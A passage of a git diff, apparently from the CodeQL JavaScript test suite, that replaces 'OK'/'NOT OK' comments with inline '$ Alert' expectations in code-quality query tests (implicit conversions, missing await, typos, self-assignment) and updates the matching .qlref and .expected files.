"OK" 100 > ''; -// OK + new Date('foo') == 'Invalid Date'; -// OK + new String('bar') == 'bar'; -// OK + ({ valueOf: () => true } == true); -// OK + ({ valueOf: () => 42 } == 42); -// OK + ({ valueOf: () => 'hi' } == 'hi'); -// OK + ({ valueOf: () => null } == null); -// NOT OK, but not currently flagged since we conservatively -// assume that `new Date(123)` could return any object, not necessarily a Date -new Date(123) == 123 +new Date(123) == 123; // $ MISSING: Alert - we conservatively assume that `new Date(123)` could return any object, not necessarily a Date function f(x1, x2, x3, x4, x5, x6){ - typeof x1 === 'object' && x1 !== null; // OK + typeof x1 === 'object' && x1 !== null; if (!x2) { x2 = new Error(); } - typeof x2 === 'object' && x2 !== null; // NOT OK: x2 cannot be null here + typeof x2 === 'object' && x2 !== null; // $ Alert - x2 cannot be null here if (x3) { - typeof x3 === 'object' && x3 !== null; // NOT OK: x3 cannot be null here + typeof x3 === 'object' && x3 !== null; // $ Alert - x3 cannot be null here } if (!x4) { - typeof x4 === 'object' && x4 !== null; // OK + typeof x4 === 'object' && x4 !== null; } if (!x5) { x5 = new Error(); } - x5 !== null; // NOT OK: x2 cannot be null here + x5 !== null; // $ Alert - x2 cannot be null here if (x6) { - x6 !== null; // NOT OK: x3 cannot be null here + x6 !== null; // $ Alert - x3 cannot be null here } } function g() { var o = {}; - o < "def"; // NOT OK + o < "def"; // $ Alert var p = { toString() { return "abc"; } }; - p < "def"; // OK + p < "def"; function A() {} var a = new A(); - a < "def"; // NOT OK + a < "def"; // $ Alert function B() {}; B.prototype = p; var b = new B(); - b < "def"; // OK + b < "def"; function C() { this.valueOf = function() { return 42; }; } var c = new C(); - c != 23; // OK + c != 23; null.valueOf = function() { return 42; }; - null == 42; // NOT OK + null == 42; // $ Alert true.valueOf = function() { return "foo" }; - true != "bar"; // NOT OK + true != "bar"; // $ Alert } @@ -139,54 +129,54 @@ function h() { var a = 42; var b = "42"; - a === "42"; // NOT OK - 42 === b // NOT OK - a === b; // NOT OK + a === "42"; // $ Alert + 42 === b // $ Alert + a === b; // $ Alert } function i() { - "foo" === undefined - undefined === "foo" // NOT OK + "foo" === undefined // $ Alert + undefined === "foo" // $ Alert var NaN = 0; // trick analysis to consider warning about NaN, for the purpose of testing pretty printing - NaN === "foo" // NOT OK + NaN === "foo" // $ Alert var Infinity = 0; // trick analysis to consider warning about Infinity, for the purpose of testing pretty printing - Infinity === "foo" // NOT OK + Infinity === "foo" // $ Alert } function k() { // tests for pretty printing of many types var t1 = 42; - t1 !== null; // NOT OK - null !== t1; // NOT OK + t1 !== null; // $ Alert + null !== t1; // $ Alert var t2 = unknown? t1: "foo"; - t2 !== null; // NOT OK - null !== t2; // NOT OK + t2 !== null; // $ Alert + null !== t2; // $ Alert var t3 = unknown? t2: undefined; - t3 !== null; // NOT OK - null !== t3; // NOT OK + t3 !== null; // $ Alert + null !== t3; // $ Alert var t4 = unknown? t3: true; - t4 !== null; // NOT OK - null !== t4; // NOT OK + t4 !== null; // $ Alert + null !== t4; // $ Alert var t5 = unknown? t4: function(){}; - t5 !== null; // NOT OK - null !== t5; // NOT OK + t5 !== null; // $ Alert + null !== t5; // $ Alert var t6 = unknown? t5: /t/; - t6 !== null; // NOT OK - null !== t6; // NOT OK + t6 !== null; // $ Alert + null !== t6; // $ Alert var t7 = unknown? t6: {}; - t7 !== null; // NOT OK - null !== t7; // NOT OK + t7 !== null; // $ Alert + null !== t7; // $ Alert var t8 = unknown? t8: new Symbol(); - t8 !== null; // NOT OK - null !== t8; // NOT OK + t8 !== null; // $ Alert + null !== t8; // $ Alert } @@ -199,22 +189,22 @@ function l() { var t4 = unknown? 42: unknown? "foo": unknown? undefined: true; var t5 = unknown? t4: null - t2 !== t4; // NOT OK - t4 !== t2; // NOT OK - t3 !== t4; // NOT OK - t4 !== t3; // NOT OK + t2 !== t4; // $ Alert + t4 !== t2; // $ Alert + t3 !== t4; // $ Alert + t4 !== t3; // $ Alert - t2 !== t5; // NOT OK - t5 !== t2; // NOT OK - t3 !== t5; // NOT OK - t5 !== t3; // NOT OK + t2 !== t5; // $ Alert + t5 !== t2; // $ Alert + t3 !== t5; // $ Alert + t5 !== t3; // $ Alert } -1n == 1; // OK +1n == 1; (function tooGeneralLocalFunctions(){ function f1(x) { - if (x === "foo") { // OK, whitelisted + if (x === "foo") { // OK - whitelisted } } @@ -222,7 +212,7 @@ function l() { function f2(x, y) { var xy = o.q? x: y; - if (xy === "foo") { // NOT OK (not whitelisted like above) + if (xy === "foo") { // $ Alert - not whitelisted like above } } @@ -230,5 +220,5 @@ function l() { })(); function f(...x) { - x === 42 + x === 42 // $ Alert }; diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected index 3168aa8b1a0b..51a9ebb1f0a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected @@ -1,17 +1,17 @@ -| tst.js:2:1:2:7 | !method | This expression will be implicitly converted from boolean to string. | -| tst.js:17:6:17:9 | null | This expression will be implicitly converted from null to object. | -| tst.js:20:6:20:13 | 'string' | This expression will be implicitly converted from string to object. | -| tst.js:26:13:26:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | -| tst.js:29:18:29:26 | !callback | This expression will be implicitly converted from boolean to object. | -| tst.js:53:5:53:10 | void 0 | This expression will be implicitly converted from undefined to number. | -| tst.js:61:3:61:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:67:8:67:8 | y | This expression will be implicitly converted from undefined to number. | -| tst.js:73:5:73:5 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:79:19:79:22 | name | This expression will be implicitly converted from undefined to string. | -| tst.js:85:3:85:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:100:5:100:7 | f() | This expression will be implicitly converted from undefined to number. | -| tst.js:106:5:106:7 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:109:13:109:15 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:110:13:110:15 | g() | This expression will be implicitly converted from undefined to string. | -| tst.js:117:8:117:8 | y | This expression will be implicitly converted from string to number. | -| tst.js:122:10:122:10 | y | This expression will be implicitly converted from string to number. | +| tst.js:1:1:1:7 | !method | This expression will be implicitly converted from boolean to string. | +| tst.js:15:6:15:9 | null | This expression will be implicitly converted from null to object. | +| tst.js:17:6:17:13 | 'string' | This expression will be implicitly converted from string to object. | +| tst.js:22:13:22:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | +| tst.js:24:18:24:26 | !callback | This expression will be implicitly converted from boolean to object. | +| tst.js:47:5:47:10 | void 0 | This expression will be implicitly converted from undefined to number. | +| tst.js:54:3:54:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:59:8:59:8 | y | This expression will be implicitly converted from undefined to number. | +| tst.js:64:5:64:5 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:69:19:69:22 | name | This expression will be implicitly converted from undefined to string. | +| tst.js:74:3:74:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:89:5:89:7 | f() | This expression will be implicitly converted from undefined to number. | +| tst.js:95:5:95:7 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:98:13:98:15 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:99:13:99:15 | g() | This expression will be implicitly converted from undefined to string. | +| tst.js:106:8:106:8 | y | This expression will be implicitly converted from string to number. | +| tst.js:111:10:111:10 | y | This expression will be implicitly converted from string to number. | diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref index 748469112b00..259f3333169e 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref @@ -1 +1,2 @@ -Expressions/ImplicitOperandConversion.ql \ No newline at end of file +query: Expressions/ImplicitOperandConversion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index 811ef9c576c9..a72dc333dac5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -1,41 +1,36 @@ -// NOT OK -!method in obj; +!method in obj; // $ Alert + -// OK !(method in obj); -// OK + '__proto__' in obj; -// OK + 0 in obj; -// OK + ('$' + key) in obj; -// NOT OK -p in null; +p in null; // $ Alert + +0 in 'string'; // $ Alert -// NOT OK -0 in 'string'; -// OK p in {}; -// NOT OK -console.log("Setting device's bluetooth name to '%s'" % device_name); +console.log("Setting device's bluetooth name to '%s'" % device_name); // $ Alert -// NOT OK -if (!callback || !callback instanceof Function) { +if (!callback || !callback instanceof Function) { // $ Alert ; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// OK + function cmp(x, y) { if (x > y) return 1; @@ -44,48 +39,42 @@ function cmp(x, y) { return 0; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// NOT OK -1 + void 0 +1 + void 0 // $ Alert + -// OK o[true] = 42; function f() { var x; - // NOT OK - x -= 2; + x -= 2; // $ Alert } function g() { var x = 19, y; - // NOT OK - x %= y; + x %= y; // $ Alert } function h() { var x; - // NOT OK - ++x; + ++x; // $ Alert } function k() { var name; - // NOT OK - return `Hello ${name}!`; + return `Hello ${name}!`; // $ Alert } function l() { var x; - // NOT OK - x ** 2; + x ** 2; // $ Alert } -1n + 1; // NOT OK, but not currently flagged +1n + 1; // $ MISSING: Alert (function(){ let sum = 0; @@ -97,27 +86,27 @@ function l() { (function(){ function f() { } - f()|0; + f()|0; // $ Alert unknown()|0; function g() { } - g()|0; + g()|0; // $ Alert g(); - var a = g() + 2; - var b = g() + "str"; + var a = g() + 2; // $ Alert + var b = g() + "str"; // $ Alert }); function m() { var x = 19, y = "string"; - x %= y; // NOT OK - x += y; // OK - x ||= y; // OK - x &&= y; // OK - x ??= y; // OK - x >>>= y; // NOT OK + x %= y; // $ Alert + x += y; + x ||= y; + x &&= y; + x ??= y; + x >>>= y; // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref b/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref index 05596cf67218..42bdeec727c7 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref @@ -1 +1,2 @@ -Expressions/MissingAwait.ql \ No newline at end of file +query: Expressions/MissingAwait.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts index 4362c11a8e67..5f1774f1ab56 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts @@ -1,5 +1,5 @@ declare let cache: { [x: string]: Promise }; function deleteCache(x: string) { - delete cache[x]; // OK + delete cache[x]; } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 10fc244dbc44..61f599a6c33d 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -5,24 +5,24 @@ async function getThing() { function useThing() { let thing = getThing(); - if (thing === undefined) {} // NOT OK + if (thing === undefined) {} // $ Alert - if (thing == null) {} // NOT OK + if (thing == null) {} // $ Alert - something(thing ? 1 : 2); // NOT OK + something(thing ? 1 : 2); // $ Alert - for (let x in thing) { // NOT OK + for (let x in thing) { // $ Alert something(x); } let obj = something(); - something(obj[thing]); // NOT OK - obj[thing] = 5; // NOT OK + something(obj[thing]); // $ Alert + obj[thing] = 5; // $ Alert - something(thing + "bar"); // NOT OK + something(thing + "bar"); // $ Alert if (something()) { - if (thing) { // NOT OK + if (thing) { // $ Alert something(3); } } @@ -31,21 +31,21 @@ function useThing() { async function useThingCorrectly() { let thing = await getThing(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // OK + return thing + "bar"; } async function useThingCorrectly2() { let thing = getThing(); - if (await thing === undefined) {} // OK + if (await thing === undefined) {} - if (await thing == null) {} // OK + if (await thing == null) {} - return thing + "bar"; // NOT OK + return thing + "bar"; // $ Alert } function getThingSync() { @@ -55,21 +55,21 @@ function getThingSync() { function useThingPossiblySync(b) { let thing = b ? getThing() : getThingSync(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // NOT OK - but we don't flag it + return thing + "bar"; // $ MISSING: Alert } function useThingInVoid() { - void getThing(); // OK + void getThing(); } function useThing() { if (random()) { - return getThing() ?? null; // NOT OK + return getThing() ?? null; // $ Alert } else { - return getThing?.() ?? null; // OK + return getThing?.() ?? null; } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js index cbfe6d3250e5..d12e82cb8c24 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js @@ -1,6 +1,6 @@ function total(bad) { var sum = 0 - for (var i = 0; i < bad; ++i) { // NOT OK + for (var i = 0; i < bad; ++i) { // $ Alert sum += bad[i] } return sum @@ -8,7 +8,7 @@ function total(bad) { function total_good(good) { var sum = 0 - for (var i = 0; i < good.length; ++i) { // OK + for (var i = 0; i < good.length; ++i) { sum += good[i] } return sum @@ -17,21 +17,21 @@ function total_good(good) { var fruits = ["banana", "pineapple"] function mix() { var drink = [] - for (var i = 0; i < fruits; ++i) { // NOT OK + for (var i = 0; i < fruits; ++i) { // $ Alert drink.push(fruits[i]) } } function mix_good() { var drink = [] - for (var i = 0; i < fruits.length; ++i) { // OK + for (var i = 0; i < fruits.length; ++i) { drink.push(fruits[i]) } } function overloaded(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } else if (mode == "blar") { return foo[bar]; } else { @@ -41,7 +41,7 @@ function overloaded(mode, foo, bar) { function overloaded_no_else(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } if (mode == "blar") { return foo[bar]; @@ -50,7 +50,7 @@ function overloaded_no_else(mode, foo, bar) { function reassigned(index, object) { var tmp = object.getMaximum() - if (index < tmp) { // OK + if (index < tmp) { tmp = object.getArray() return tmp[index] } diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref index 2f3f0ef91259..022ddb3021ce 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref @@ -1 +1,2 @@ -Expressions/MissingDotLengthInComparison.ql +query: Expressions/MissingDotLengthInComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref index a9b914e23115..94b18824cca5 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref @@ -1 +1,2 @@ -Expressions/MissingSpaceInAppend.ql +query: Expressions/MissingSpaceInAppend.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js index bdb85cc5bb11..36a28584382e 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js +++ b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js @@ -1,32 +1,32 @@ var s; -s = "this text" + +s = "this text" + // $ Alert "is missing a space"; -s = "the class java.util.ArrayList" + +s = "the class java.util.ArrayList" + // $ Alert "without a space"; -s = "This isn't" + +s = "This isn't" + // $ Alert "right."; -s = "There's 1" + +s = "There's 1" + // $ Alert "thing wrong"; -s = "There's A/B" + +s = "There's A/B" + // $ Alert "and no space"; -s = "Wait for it...." + +s = "Wait for it...." + // $ Alert "No space!"; -s = "Is there a space?" + +s = "Is there a space?" + // $ Alert "No!"; -("missing " + "a space") + "here"; +("missing " + "a space") + "here"; // $ Alert // syntactic variants: -s = "missing a space" + +s = "missing a space" + // $ Alert "here"; -s = 'missing a space' + +s = 'missing a space' + // $ Alert 'here'; -s = `missing a space` + +s = `missing a space` + // $ Alert "here"; -s = "missing a space" + +s = "missing a space" + // $ Alert `here`; -s = `missing a space` + +s = `missing a space` + // $ Alert `here`; -s = (("missing space") + "here") +s = (("missing space") + "here") // $ Alert -s = (("h. 0" + "h")) + "word" +s = (("h. 0" + "h")) + "word" // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected index 1bf8599b8be5..05bc8f28ad14 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected @@ -1,6 +1,6 @@ -| tst.js:5:19:5:24 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:5:26:10 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:16:26:21 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:32:27:32:34 | avalable | 'avalable' may be a typo for 'available'. | -| tst.js:42:5:42:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | -| tst.js:43:5:43:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | +| tst.js:4:19:4:24 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:5:24:10 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:16:24:21 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:29:27:29:34 | avalable | 'avalable' may be a typo for 'available'. | +| tst.js:39:5:39:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | +| tst.js:40:5:40:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref index fc411787f5bf..4f10b063bb99 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref @@ -1 +1,2 @@ -Expressions/MisspelledIdentifier.ql \ No newline at end of file +query: Expressions/MisspelledIdentifier.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js index 101c6b360b48..5016873b6a59 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js @@ -1,43 +1,40 @@ // use of .length to prime the query a.length; -// NOT OK -for (var i=0; i - errorMessage; + errorMessage; // $ Alert } function foo() { var thisHander; - thisHandler.foo1; - thisHandler.foo2; - thisHandler.foo3; - thisHandler.foo4; - thisHandler.foo5; - thisHandler.foo6; - thisHandler.foo7; - thisHandler.foo8; + thisHandler.foo1; // $ Alert + thisHandler.foo2; // $ Alert + thisHandler.foo3; // $ Alert + thisHandler.foo4; // $ Alert + thisHandler.foo5; // $ Alert + thisHandler.foo6; // $ Alert + thisHandler.foo7; // $ Alert + thisHandler.foo8; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref b/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref index f7b19a84df53..f8401e03f0d5 100644 --- a/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref +++ b/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref @@ -1 +1,2 @@ -Expressions/RedundantExpression.ql \ No newline at end of file +query: Expressions/RedundantExpression.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js b/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js index b556d518eca4..25db749dde38 100644 --- a/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js +++ b/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js @@ -1,11 +1,11 @@ -(x + x) / 2; -e[i] - e[i]; -(x + y)/(x + y); -window.height - window.height; -x == 23 || x == 23; +(x + x) / 2; // $ Alert +e[i] - e[i]; // $ Alert +(x + y)/(x + y); // $ Alert +window.height - window.height; // $ Alert +x == 23 || x == 23; // $ Alert x & x; // this may actually be OK, but it's not good style -pop() && pop(); +pop() && pop(); // $ Alert -foo[bar++] && foo[bar++] // OK \ No newline at end of file +foo[bar++] && foo[bar++] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected index e97b3e8fe783..fcdf350a9268 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected @@ -1,5 +1,5 @@ | jsdoc.js:9:5:9:19 | this.y = this.y | This expression assigns property y to itself. | | jsdoc.js:11:5:11:23 | this.arg = this.arg | This expression assigns property arg to itself. | -| tst.js:5:2:5:14 | width = width | This expression assigns variable width to itself. | -| tst.js:24:1:24:19 | array[1] = array[1] | This expression assigns element 1 to itself. | -| tst.js:27:1:27:9 | o.x = o.x | This expression assigns property x to itself. | +| tst.js:4:2:4:14 | width = width | This expression assigns variable width to itself. | +| tst.js:22:1:22:19 | array[1] = array[1] | This expression assigns element 1 to itself. | +| tst.js:24:1:24:9 | o.x = o.x | This expression assigns property x to itself. | diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref index 8956117be70e..592467638457 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref @@ -1 +1,2 @@ -Expressions/SelfAssignment.ql \ No newline at end of file +query: Expressions/SelfAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js b/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js index 03bfc0b5573b..d72b3ec65f94 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js @@ -6,8 +6,8 @@ class C extends Q { */ this.x = this.x; // OK - documentation - this.y = this.y; // NOT OK + this.y = this.y; // $ Alert - this.arg = this.arg; // NOT OK + this.arg = this.arg; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js b/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js index 246651e37a67..36eb815fc2dd 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js @@ -1,8 +1,7 @@ function Rectangle(x, y, width, height) { this.x = x; this.y = y; - // NOT OK - width = width; + width = width; // $ Alert this.height = height; } @@ -15,18 +14,16 @@ Rectangle.prototype = { this.width = a/this.height; }, foo: function() { - // OK + this.area = this.area; } }; -// NOT OK -array[1] = array[1]; +array[1] = array[1]; // $ Alert + +o.x = o.x; // $ Alert -// NOT OK -o.x = o.x; -// OK document.innerHTML = document.innerHTML; class Point { @@ -43,7 +40,7 @@ class Point { this.y = 0; } foo() { - // OK + this.dist = this.dist; } } diff --git a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref index 1c2d75cde4ad..609eb065ea75 100644 --- a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref +++ b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref @@ -1 +1,2 @@ -Expressions/ShiftOutOfRange.ql \ No newline at end of file +query: Expressions/ShiftOutOfRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js index a8cedd993b2a..1ee755fd46b9 100644 --- a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js @@ -1,2 +1,2 @@ -var n = 1<<40; // NOT OK -var n2 = BigInt(1) << 40n; // OK +var n = 1<<40; // $ Alert +var n2 = BigInt(1) << 40n; diff --git a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref index a3772e3b4dd1..9f842782a35b 100644 --- a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref +++ b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref @@ -1 +1,2 @@ -Expressions/StringInsteadOfRegex.ql \ No newline at end of file +query: Expressions/StringInsteadOfRegex.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js index 685b56525e06..79557ef1563e 100644 --- a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js +++ b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js @@ -1,46 +1,46 @@ function NOT_OK() { // regex-like strings - "".replace("/foo/i", ""); - "".replace("/^foo/", ""); - "".replace("/foo$/", ""); - "".replace("^foo$", ""); - "".replace("\s", ""); - "".replace("foo\sbar", ""); - "".replace("foo\s", ""); - "".replace("\sbar", ""); - "".replace("foo\[bar", ""); - "".replace("\[", ""); - "".replace("\]", ""); - "".replace("\(", ""); - "".replace("\)", ""); - "".replace("\*", ""); - "".replace("\+", ""); - "".replace("\?", ""); - "".replace("\{", ""); - "".replace("\}", ""); - "".replace("\|", ""); - "".replace("\^", ""); - "".replace("\$", ""); - "".replace("[a-zA-Z123]+", ""); - "".replace("[a-z]+", ""); - "".replace("[a-z]*", ""); - "".replace("[0-9_-]+", ""); - "".replace("[^a-z]+", ""); - "".replace("foo[^a-z]+bar", ""); + "".replace("/foo/i", ""); // $ Alert + "".replace("/^foo/", ""); // $ Alert + "".replace("/foo$/", ""); // $ Alert + "".replace("^foo$", ""); // $ Alert + "".replace("\s", ""); // $ Alert + "".replace("foo\sbar", ""); // $ Alert + "".replace("foo\s", ""); // $ Alert + "".replace("\sbar", ""); // $ Alert + "".replace("foo\[bar", ""); // $ Alert + "".replace("\[", ""); // $ Alert + "".replace("\]", ""); // $ Alert + "".replace("\(", ""); // $ Alert + "".replace("\)", ""); // $ Alert + "".replace("\*", ""); // $ Alert + "".replace("\+", ""); // $ Alert + "".replace("\?", ""); // $ Alert + "".replace("\{", ""); // $ Alert + "".replace("\}", ""); // $ Alert + "".replace("\|", ""); // $ Alert + "".replace("\^", ""); // $ Alert + "".replace("\$", ""); // $ Alert + "".replace("[a-zA-Z123]+", ""); // $ Alert + "".replace("[a-z]+", ""); // $ Alert + "".replace("[a-z]*", ""); // $ Alert + "".replace("[0-9_-]+", ""); // $ Alert + "".replace("[^a-z]+", ""); // $ Alert + "".replace("foo[^a-z]+bar", ""); // $ Alert // shapes - f().replace("/foo/i", x); + f().replace("/foo/i", x); // $ Alert var v1 = "/foo/i"; - f().replace(v1, x); - o.p.q.replace("/foo/i", x); + f().replace(v1, x); // $ Alert + o.p.q.replace("/foo/i", x); // $ Alert // examples in the wild - "".replace('^\s+|\s+$', ''); - "".replace("[^a-zA-Z0-9 ]+", ""); + "".replace('^\s+|\s+$', ''); // $ Alert + "".replace("[^a-zA-Z0-9 ]+", ""); // $ Alert // non-replace methods - "".split("/foo/i"); - "".split("/foo/i", 